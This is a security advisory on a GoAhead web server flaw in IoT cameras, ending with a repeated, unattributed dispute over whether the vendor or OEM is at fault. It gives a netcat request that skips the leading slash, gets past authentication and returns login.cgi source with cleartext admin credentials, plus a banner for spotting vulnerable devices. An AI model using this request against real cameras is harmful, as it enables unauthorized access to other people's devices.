SSD Advisory – Over 100K IoT Cameras Vulnerable to Source Disclosure
Vulnerability Summary
The following advisory describes an arbitrary file content disclosure vulnerability found in the GoAhead web server.
The GoAhead web server is present on multiple embedded devices, from IP Cameras to Printers and other embedded devices.
The vulnerability allows a remote unauthenticated attacker to disclose the contents of the file being accessed instead of having the server execute it. Because most embedded devices do not run a SQL (or SQL-like) database daemon, the credentials for authentication are stored inside that file itself. Through this disclosure, an attacker can read the credentials required to access the device.
Credit
An independent security researcher Istvan Toth has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
Vendor response
Update #2: The file disclosure caused by a request path that lacks the leading “/” dates back to 2004, http://aluigi.altervista.org/adv/goahead-adv2.txt. I cannot find any indication of when GoAhead fixed it; in any case, it is still present in 2017 in devices that use the GoAhead server.
Update: The vendor (GoAhead) claims the vulnerability is not in its product, but rather in the camera vendor’s code.
We at Beyond Security are unsure about this, but as none of the camera vendors responded, we are left in the dark as to the root cause of the vulnerability.
Since this vulnerability affects a large number of devices that ship the GoAhead web server (these devices appear to run old versions of GoAhead), there is no single company to which these vulnerabilities can be reported or which can address them; furthermore, the majority of the vulnerable products are OEM products with no real “vendor” behind them.
We urge users who have an embedded device running GoAhead, which can be recognized by the following banner returned when you connect to the device’s web interface:
Server: GoAhead-Webs
to remove the device from the network or, at the very least, to restrict access to the web interface to a very strict IP address range.
Vulnerability Details
The vulnerability is triggered by sending a malformed request to the web server. The difference between a regular request and the request that triggers the vulnerability can be seen below:
Normal request-response
$ echo -e "GET /login.cgi\n" | nc 192.168.88.131 81
nc: using stream socket
HTTP/1.1 401 Unauthorized
Server: GoAhead-Webs
Date: Sun Feb 19 12:59:31 2017
WWW-Authenticate: Digest realm="GoAhead", domain=":81",qop="auth", nonce="ecfe10f4065c572c386bf68494d0c15a", opaque="5ccc069c403ebaf9f0171e9517f40e41",algorithm="MD5", stale="FALSE"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html

<html><head><title>Document Error: Unauthorized</title></head>
<body><h2>Access Error: Unauthorized</h2>
<p>Access to this document requires a User ID</p></body></html>
Vulnerability triggering request-response
A request whose path lacks the leading ‘/’ bypasses the server’s HTTP authentication (Digest authentication, as the 401 response above shows). Moreover, requesting login.cgi this way returns the file’s source, which contains the cleartext credentials, instead of executing it:
$ echo -e "GET login.cgi\n" | nc 192.168.88.131 81
nc: using stream socket
HTTP/1.1 200 OK
Date: Sun Feb 19 12:59:36 2017
Server: GoAhead-Webs
Last-modified: Thu Jan 1 00:00:00 1970
Content-type: text/html
Cache-Control:no-cache
Content-length: 77
Connection: close

var loginuser="admin";
var loginpass="xxxx";
var pri=255;
The file (login.cgi) is not part of the GoAhead source distribution — it is a device OEM supplied file. So flagging all “GoAhead” http header devices is incorrect. There are many, many devices using GoAhead without such vulnerabilities.
Also, you should contact the GoAhead vendor (https://www.embedthis.com) first prior to disclosure as part of responsible disclosure practice.
We never said that the vulnerability is in the login.cgi, the vulnerability is in the web server that discloses the information (source code) rather than executes the file – which is the expected behavior.
The vulnerability dates back to 2004 – as can be seen here: http://aluigi.altervista.org/adv/goahead-adv2.txt
Please correct this disclosure. It is incorrect. Those files are not part of the GoAhead distribution, they are device OEM specific from a common white-label camera OEM.
Please practice responsible disclosure and inform the GoAhead vendor in future before release.
We never said that the vulnerability is in the login.cgi, the vulnerability is in the web server that discloses the information (source code) rather than executes the file – which is the expected behavior.
The vulnerability dates back to 2004 – as can be seen here: http://aluigi.altervista.org/adv/goahead-adv2.txt